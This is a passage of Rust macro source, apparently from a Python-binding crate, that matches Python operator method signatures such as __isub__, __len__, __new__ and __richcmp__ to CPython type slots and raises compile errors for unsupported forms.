/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_rshift: $crate::py_class_binary_slot!($class::__irshift__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __irshift__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __irshift__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __irshift__" }
};
{ { def __isub__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_subtract: $crate::py_class_binary_slot!($class::__isub__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __isub__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __isub__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_subtract: $crate::py_class_binary_slot!($class::__isub__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __isub__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __isub__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_subtract: $crate::py_class_binary_slot!($class::__isub__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __isub__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __isub__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __isub__" }
};
{ { def __iter__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_iter: $crate::py_class_unary_slot!($class::__iter__, *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __iter__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __iter__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __iter__" }
};
{ { def __itruediv__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_true_divide: $crate::py_class_binary_slot!($class::__itruediv__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __itruediv__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __itruediv__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_true_divide: $crate::py_class_binary_slot!($class::__itruediv__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __itruediv__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __itruediv__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_true_divide: $crate::py_class_binary_slot!($class::__itruediv__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __itruediv__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __itruediv__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __itruediv__" }
};
{ { def __ixor__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_xor: $crate::py_class_binary_slot!($class::__ixor__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ixor__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __ixor__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_xor: $crate::py_class_binary_slot!($class::__ixor__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ixor__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __ixor__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_xor: $crate::py_class_binary_slot!($class::__ixor__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ixor__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __ixor__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __ixor__" }
};
{ { def __le__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__le__ is not supported by py_class! use __richcmp__ instead." }
};
{ { def __len__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt
/* as_sequence */ [ $( $sq_slot_name:ident : $sq_slot_value:expr, )* ]
/* as_mapping */ [ $( $mp_slot_name:ident : $mp_slot_value:expr, )* ]
$setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number
/* as_sequence */ [
$( $sq_slot_name : $sq_slot_value, )*
sq_length: $crate::py_class_unary_slot!($class::__len__, $crate::_detail::ffi::Py_ssize_t, $crate::py_class::slots::LenResultConverter),
]
/* as_mapping */ [
$( $mp_slot_name : $mp_slot_value, )*
mp_length: Some($crate::_detail::ffi::PySequence_Size),
]
$setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __len__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __len__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __len__" }
};
{ { def __long__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__long__ is not supported by py_class! yet." }
};
{ { def __lshift__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_lshift: $crate::py_class_numeric_slot!(binary $class::__lshift__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __lshift__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __lshift__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __lshift__" }
};
{ { def __lt__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__lt__ is not supported by py_class! use __richcmp__ instead." }
};
{ { def __matmul__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_matrix_multiply: $crate::py_class_numeric_slot!(binary $class::__matmul__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __matmul__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __matmul__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __matmul__" }
};
{ { def __mod__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_remainder: $crate::py_class_numeric_slot!(binary $class::__mod__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __mod__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __mod__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __mod__" }
};
{ { def __mul__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_multiply: $crate::py_class_numeric_slot!(binary $class::__mul__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __mul__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __mul__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __mul__" }
};
{ { def __ne__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__ne__ is not supported by py_class! use __richcmp__ instead." }
};
{ { def __neg__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_negative: $crate::py_class_unary_slot!($class::__neg__, *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __neg__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __neg__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __neg__" }
};
{ { def __new__ ($cls:ident) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_new: $crate::py_class_wrap_newfunc!{$class::__new__ []},
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __new__($cls: &$crate::PyType,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { $visibility:vis def __new__ ($cls:ident) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_new: $crate::py_class_wrap_newfunc!{$class::__new__ []},
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, $visibility, __new__($cls: &$crate::PyType,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __new__ ($cls:ident, $($p:tt)+) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_new: $crate::py_argparse_parse_plist_impl!{py_class_wrap_newfunc {$class::__new__} [] ($($p)+,)},
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_argparse_parse_plist_impl!{
py_class_impl_item { $class, $py, pub, __new__($cls: &$crate::PyType,) $res_type; { $($body)* } }
[] ($($p)+,)
}
}
$members $props
}};
{ { $visibility:vis def __new__ ($cls:ident, $($p:tt)+) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_new: $crate::py_argparse_parse_plist_impl!{py_class_wrap_newfunc {$class::__new__} [] ($($p)+,)},
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_argparse_parse_plist_impl!{
py_class_impl_item { $class, $py, $visibility, __new__($cls: &$crate::PyType,) $res_type; { $($body)* } }
[] ($($p)+,)
}
}
$members $props
}};
{ { def __next__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_iternext: $crate::py_class_unary_slot!($class::__next__, *mut $crate::_detail::ffi::PyObject, $crate::py_class::slots::IterNextResultConverter),
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __next__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __next__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __next__" }
};
{ { def __nonzero__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__nonzero__ is not supported by py_class!; use the Python 3 spelling __bool__ instead." }
};
{ { def __or__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_or: $crate::py_class_numeric_slot!(binary $class::__or__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __or__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __or__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __or__" }
};
{ { def __pos__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_positive: $crate::py_class_unary_slot!($class::__pos__, *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __pos__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __pos__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __pos__" }
};
{ { def __pow__($left:ident, $right:ident, $ex:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_power: $crate::py_class_numeric_slot!(ternary $class::__pow__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __pow__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } { $ex : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __pow__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for ternary numeric operator __pow__" }
};
{ { def __radd__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __radd__ is not supported by py_class! Use __add__ instead!" }
};
{ { def __rand__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rand__ is not supported by py_class! Use __and__ instead!" }
};
{ { def __rdiv__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rdiv__ is not supported by py_class! Use __div__ instead!" }
};
{ { def __rdivmod__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rdivmod__ is not supported by py_class! Use __divmod__ instead!" }
};
{ { def __repr__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_repr: $crate::py_class_unary_slot!($class::__repr__, *mut $crate::_detail::ffi::PyObject, $crate::_detail::PythonObjectCallbackConverter::<$crate::PyString>(std::marker::PhantomData)),
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __repr__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __repr__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __repr__" }
};
{ { def __rfloordiv__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rfloordiv__ is not supported by py_class! Use __floordiv__ instead!" }
};
{ { def __richcmp__(&$slf:ident, $other:ident : Option<&$other_name:ty>, $op:ident : $op_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_richcompare: $crate::py_class_richcompare_slot!($class::__richcmp__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __richcmp__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} } { $op : $op_name = {} }] }
}
$members $props
}};
{ { def __richcmp__(&$slf:ident, $other:ident : &$other_name:ty, $op:ident : $op_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_richcompare: $crate::py_class_richcompare_slot!($class::__richcmp__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __richcmp__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} } { $op : $op_name = {} }] }
}
$members $props
}};
{ { def __richcmp__(&$slf:ident, $other:ident : $other_name:ty, $op:ident : $op_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_richcompare: $crate::py_class_richcompare_slot!($class::__richcmp__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __richcmp__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} } { $op : $op_name = {} }] }
}
$members $props
}};
{ { def __richcmp__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __richcmp__" }
};
{ { def __rlshift__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rlshift__ is not supported by py_class! Use __lshift__ instead!" }
};
{ { def __rmatmul__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rmatmul__ is not supported by py_class! Use __matmul__ instead!" }
};
{ { def __rmod__ $($tail:tt)* } $( $stuff:tt )* } => {
